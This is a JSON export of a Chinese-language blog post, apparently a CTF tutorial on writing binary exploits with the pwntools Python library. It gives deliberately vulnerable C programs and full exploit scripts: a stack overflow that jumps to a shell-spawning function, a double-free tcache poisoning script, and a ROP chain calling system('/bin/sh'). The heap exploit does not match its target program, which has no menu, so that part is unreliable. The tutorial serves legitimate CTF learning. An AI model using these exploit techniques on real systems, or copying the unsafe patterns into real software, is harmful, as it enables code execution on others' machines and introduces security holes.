{"id":120,"date":"2024-12-04T05:16:03","date_gmt":"2024-12-04T05:16:03","guid":{"rendered":"https:\/\/burningthepasttvt.damo.sg\/?p=120"},"modified":"2024-12-04T05:17:51","modified_gmt":"2024-12-04T05:17:51","slug":"pwntools%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95%e5%90%88%e9%9b%86","status":"publish","type":"post","link":"https:\/\/burningthepasttvt.damo.sg\/?p=120","title":{"rendered":"pwntools\u4f7f\u7528\u65b9\u6cd5\u5408\u96c6"},"content":{"rendered":"\n

pwntools<\/code> \u662f\u4e00\u4e2a\u5f3a\u5927\u7684 Python \u5e93\uff0c\u7528\u4e8e\u7f16\u5199\u4e8c\u8fdb\u5236\u6f0f\u6d1e\u5229\u7528\u811a\u672c\u3002\u5728 CTF \u4e2d\uff0c\u5b83\u63d0\u4f9b\u4e86\u4fbf\u6377\u7684\u63a5\u53e3\u4e0e\u76ee\u6807\u7a0b\u5e8f\u4ea4\u4e92\uff0c\u80fd\u591f\u5e2e\u52a9\u4f60\u5feb\u901f\u7f16\u5199\u6f0f\u6d1e\u5229\u7528\u4ee3\u7801\u3002<\/p>\n\n\n\n

\u4ee5\u4e0b\u662f\u4f7f\u7528 pwntools<\/code> \u7f16\u5199 PWN \u5229\u7528\u811a\u672c\u7684\u57fa\u672c\u6b65\u9aa4\u548c\u5e38\u89c1\u6280\u5de7\uff1a<\/p>\n\n\n\n

\n\n\n\n

1. \u5b89\u88c5 pwntools<\/strong><\/h2>\n\n\n\n
pip install pwntools\n<\/code><\/pre>\n\n\n\n
\n\n\n\n
2. \u57fa\u7840\u7528\u6cd5<\/strong><\/h2>\n\n\n\n
\u4ee5\u4e0b\u662f\u4e00\u4e9b\u5e38\u7528\u529f\u80fd\u7684\u4ecb\u7ecd\uff1a<\/p>\n\n\n\n
2.1 \u8fde\u63a5\u76ee\u6807<\/h3>\n\n\n\n
    \n
  • \u672c\u5730\u8fd0\u884c<\/strong>\uff1a<\/li>\n\n\n\n
  •  \u2018\u2019\u2018from pwn import * p = process('.\/vulnerable') # \u672c\u5730\u76ee\u6807<\/code>\u2019\u2018\u2019<\/li>\n\n\n\n
  • \u8fdc\u7a0b\u8fde\u63a5<\/strong>\uff1a p = remote('example.com', 1234) # \u8fdc\u7a0b\u76ee\u6807<\/code><\/li>\n<\/ul>\n\n\n\n
    2.2 \u53d1\u9001\u548c\u63a5\u6536\u6570\u636e<\/h3>\n\n\n\n
      \n
    • \u53d1\u9001\u6570\u636e<\/strong>\uff1a p.send(b'hello') # \u53d1\u9001\u6570\u636e\uff08\u5b57\u8282\u6d41\uff09 p.sendline(b'hello') # \u53d1\u9001\u5e76\u52a0\u4e0a\u6362\u884c\u7b26<\/code><\/li>\n\n\n\n
    • \u63a5\u6536\u6570\u636e<\/strong>\uff1a response = p.recv() # \u63a5\u6536\u6240\u6709\u6570\u636e response = p.recvline() # \u63a5\u6536\u4e00\u884c\u6570\u636e response = p.recvuntil(b':') # \u63a5\u6536\u5230\u6307\u5b9a\u5b57\u7b26<\/code><\/li>\n<\/ul>\n\n\n\n
      2.3 \u5e38\u89c1\u529f\u80fd<\/h3>\n\n\n\n
        \n
      • \u4ea4\u4e92\u6a21\u5f0f<\/strong>\uff1a\u7528\u4e8e\u4e0e\u7a0b\u5e8f\u4ea4\u4e92\u8c03\u8bd5\u3002 p.interactive()<\/code><\/li>\n\n\n\n
      • \u8c03\u8bd5\u7a0b\u5e8f<\/strong>\uff1a\u9644\u52a0 GDB\u3002 gdb.attach(p, gdbscript=\"b main\")<\/code><\/li>\n\n\n\n
      • \u52a0\u8f7d ELF \u548c libc<\/strong>\uff1a elf = ELF('.\/vulnerable') # \u52a0\u8f7d\u76ee\u6807 ELF \u6587\u4ef6 libc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6') # \u52a0\u8f7d libc \u6587\u4ef6<\/code><\/li>\n<\/ul>\n\n\n\n
        \n\n\n\n
        3. \u7f16\u5199\u4e00\u4e2a\u7b80\u5355\u7684\u6808\u6ea2\u51fa\u5229\u7528\u811a\u672c<\/strong><\/h2>\n\n\n\n
        \u4ee5\u4e0b\u662f\u4e00\u4e2a\u57fa\u7840\u6808\u6ea2\u51fa\u7684\u4f8b\u5b50\uff1a<\/p>\n\n\n\n
        \u6f0f\u6d1e\u7a0b\u5e8f vulnerable.c<\/code>\uff1a<\/h3>\n\n\n\n
        #include <stdio.h>\n#include <string.h>\n\nvoid win() {\n    system(\"\/bin\/sh\");\n}\n\nvoid vuln() {\n    char buffer[64];\n    gets(buffer);  \/\/ \u6f0f\u6d1e\u70b9\uff1a\u6ca1\u6709\u8fb9\u754c\u68c0\u67e5\n}\n\nint main() {\n    vuln();\n    return 0;\n}\n<\/code><\/pre>\n\n\n\n
        \u7f16\u8bd1\u547d\u4ee4\uff1a<\/h3>\n\n\n\n
        gcc -o vulnerable vulnerable.c -no-pie -fno-stack-protector\n<\/code><\/pre>\n\n\n\n
        \u5229\u7528\u811a\u672c\uff1a<\/h3>\n\n\n\n
        from pwn import *\n\n# \u8bbe\u7f6e\u4e0a\u4e0b\u6587\uff08\u53ef\u9009\uff0c\u65b9\u4fbf\u8c03\u8bd5\uff09\ncontext(os='linux', arch='amd64')\ncontext.log_level = 'debug'\n\n# \u8fde\u63a5\u76ee\u6807\u7a0b\u5e8f\np = process('.\/vulnerable')  # \u672c\u5730\u8fd0\u884c\n# p = remote('example.com', 1234)  # \u8fdc\u7a0b\u8fde\u63a5\n\n# \u52a0\u8f7d ELF \u6587\u4ef6\nelf = ELF('.\/vulnerable')\nwin_addr = elf.symbols['win']  # \u83b7\u53d6 win \u51fd\u6570\u5730\u5740\n\n# \u6784\u9020 Payload\npadding = b'A' * 72  # \u6839\u636e\u6808\u5e03\u5c40\u8ba1\u7b97\u504f\u79fb\npayload = padding + p64(win_addr)\n\n# \u53d1\u9001 Payload\np.sendline(payload)\n\n# \u6253\u5f00\u4ea4\u4e92\u6a21\u5f0f\np.interactive()\n<\/code><\/pre>\n\n\n\n
        \n\n\n\n
        4. \u5806\u5229\u7528\u7684\u4f8b\u5b50<\/strong><\/h2>\n\n\n\n
        \u9488\u5bf9\u5806\u6f0f\u6d1e\uff0c\u4ee5\u4e0b\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u5229\u7528 tcache poisoning<\/code> \u7684\u811a\u672c\uff1a<\/p>\n\n\n\n
        \u6f0f\u6d1e\u7a0b\u5e8f heap_vuln.c<\/code>\uff1a<\/h3>\n\n\n\n
        #include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\nvoid secret() {\n    system(\"\/bin\/sh\");\n}\n\nint main() {\n    char *a = malloc(0x60);\n    char *b = malloc(0x60);\n    free(a);\n    free(a);  \/\/ Double free \u6f0f\u6d1e\n    return 0;\n}\n<\/code><\/pre>\n\n\n\n
        \u7f16\u8bd1\u547d\u4ee4\uff1a<\/h3>\n\n\n\n
        gcc -o heap_vuln heap_vuln.c -no-pie -g\n<\/code><\/pre>\n\n\n\n
        \u5229\u7528\u811a\u672c\uff1a<\/h3>\n\n\n\n
        from pwn import *\n\n# \u8bbe\u7f6e\u4e0a\u4e0b\u6587\ncontext(os='linux', arch='amd64')\ncontext.log_level = 'debug'\n\n# \u542f\u52a8\u76ee\u6807\u7a0b\u5e8f\np = process('.\/heap_vuln')\nelf = ELF('.\/heap_vuln')\n\n# \u5229\u7528 tcache \u53cc\u91cd\u91ca\u653e\np.sendlineafter('>', '1')  # malloc a\np.sendlineafter('>', '1')  # malloc b\np.sendlineafter('>', '2')  # free a\np.sendlineafter('>', '2')  # free a again\n\n# \u4f2a\u9020\u5806\u5730\u5740\np.sendlineafter('>', '1')\np.sendlineafter('>', '1')  # \u5206\u914d\u5230\u4f2a\u9020\u5730\u5740\n\n# \u52ab\u6301\u63a7\u5236\u6d41\nsecret_func = elf.symbols['secret']\np.sendlineafter('>', p64(secret_func))\n\n# \u4ea4\u4e92\u6a21\u5f0f\np.interactive()\n<\/code><\/pre>\n\n\n\n
        \n\n\n\n
        5. \u7ed3\u5408 ROP \u5b9e\u73b0\u590d\u6742\u5229\u7528<\/strong><\/h2>\n\n\n\n
        ROP\uff08Return-Oriented Programming\uff09\u662f\u7ed5\u8fc7 NX \u9632\u62a4\u7684\u6838\u5fc3\u6280\u672f\u3002pwntools<\/code> \u63d0\u4f9b\u4e86 ROP \u5de5\u5177\uff1a<\/p>\n\n\n\n
        \u5229\u7528 ROP\uff1a<\/h3>\n\n\n\n
        from pwn import *\n\n# \u52a0\u8f7d\u76ee\u6807\nelf = ELF('.\/vulnerable')\nrop = ROP(elf)\n\n# \u5bfb\u627e gadgets \u548c\u6784\u9020 ROP \u94fe\nrop.raw(rop.find_gadget(['pop rdi', 'ret'])[0])  # \u52a0\u8f7d\u53c2\u6570\nrop.raw(next(elf.search(b'\/bin\/sh')))           # \"\/bin\/sh\" \u7684\u5730\u5740\nrop.raw(elf.plt['system'])                      # \u8c03\u7528 system\n\n# \u6253\u5370 ROP \u94fe\nlog.info(\"ROP chain: \" + str(rop))\n\n# \u6784\u9020 Payload\npadding = b'A' * 72\npayload = padding + rop.chain()\n\n# \u53d1\u9001 Payload\np = process('.\/vulnerable')\np.sendline(payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n
        \n\n\n\n
        6. \u8c03\u8bd5\u4e0e\u4f18\u5316<\/strong><\/h2>\n\n\n\n
          \n
        • \u52a8\u6001\u8c03\u8bd5<\/strong>\uff1a\u8fd0\u884c\u811a\u672c\u524d\u4f7f\u7528 gdb<\/code> \u9644\u52a0\u8c03\u8bd5\u3002<\/li>\n\n\n\n
        • \u65e5\u5fd7\u4fe1\u606f<\/strong>\uff1a\u901a\u8fc7 context.log_level<\/code> \u8c03\u6574\u65e5\u5fd7\u7ea7\u522b\uff0c\u89c2\u5bdf\u4ea4\u4e92\u7ec6\u8282\u3002<\/li>\n\n\n\n
        • \u81ea\u52a8\u5316<\/strong>\uff1a\u5229\u7528 pwntools<\/code> \u4e2d\u7684\u81ea\u52a8\u5316\u5de5\u5177\uff0c\u5982 cyclic<\/code> \u81ea\u52a8\u5b9a\u4f4d\u504f\u79fb\u91cf\u3002<\/li>\n<\/ul>\n\n\n\n
          \n\n\n\n
          <\/p>\n","protected":false},"excerpt":{"rendered":"
          pwntools \u662f\u4e00\u4e2a\u5f3a\u5927\u7684 Python \u5e93\uff0c\u7528\u4e8e\u7f16\u5199\u4e8c\u8fdb\u5236\u6f0f\u6d1e\u5229\u7528\u811a\u672c\u3002\u5728 CTF \u4e2d\uff0c\u5b83\u63d0\u4f9b\u4e86\u4fbf\u6377\u7684\u63a5 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-120","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/posts\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=120"}],"version-history":[{"count":2,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/posts\/120\/revisions"}],"predecessor-version":[{"id":122,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=\/wp\/v2\/posts\/120\/revisions\/122"}],"wp:attachment":[{"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/burningthepasttvt.damo.sg\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}